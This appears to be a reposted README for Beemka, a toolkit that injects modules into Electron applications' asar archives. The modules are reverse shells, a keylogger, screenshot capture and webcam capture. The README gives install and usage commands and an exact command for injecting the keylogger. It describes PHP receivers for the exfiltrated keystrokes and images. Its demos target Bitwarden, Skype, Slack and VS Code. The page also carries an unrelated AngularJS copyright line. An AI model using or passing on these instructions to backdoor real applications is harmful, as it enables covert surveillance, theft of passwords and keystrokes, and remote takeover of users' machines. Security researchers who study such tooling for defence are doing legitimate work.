beemka: Basic Electron Exploitation

BEEMKA – Electron Exploitation Toolkit

Modules

Available modules

[ rshell_cmd ] Windows Reverse Shell
[ rshell_linux ] Linux Reverse Shell
[ screenshot ] Screenshot Module
[ rshell_powershell ] PowerShell Reverse Shell
[ keylogger ] Keylogger Module
[ webcamera ] WebCamera Module

Install

Requirements

  • Python 3.5+
  • jsmin

Download

git clone https://github.com/ctxis/beemka.git
pip3 install -r requirements.txt

Use

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]

[-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
[-m MODULE] [-u] [-z]

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-l, --list-modules List all available modules.
-i, --inject Inject code into Electron.
-f ASAR_FILE, --asar ASAR_FILE
Path to electron.asar file.
-p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
Temporary working path to use for extracting asar
archives.
-o OUTPUT_FILE, --output OUTPUT_FILE
Path to the file that will be generated.
-m MODULE, --module MODULE
Module to inject. Use --list-modules to list available
modules.
-u, --unpack Unpack asar file.
-z, --pack Pack asar file.

 

Injecting a module into an application:

python3 beemka.py –inject –module keylogger –asar “PATH_TO_ELECTRON.ASAR” –output “SAVE_AS_ASAR”

Exfiltration helpers

Under the ./server directory there are the following files:

text.php

This file can be used to receive data sent by the keylogger module.

Before using it, make sure you update the “$storage” parameter at the beginning of the file.

image.php

This file can be used to receive data sent by the webcamera and screenshot modules.

Before using it, make sure you update the “$storage” parameter at the beginning of the file.

Demo

Bitwarden Password Egress

 

Skype Reverse Shell (Linux)

 

Slack Desktop Screenshots

 

VS Code WebCamera

 

More info, please visit here.

Copyright (c) 2010-2018 Google, Inc. http://angularjs.org

Source: https://github.com/ctxis/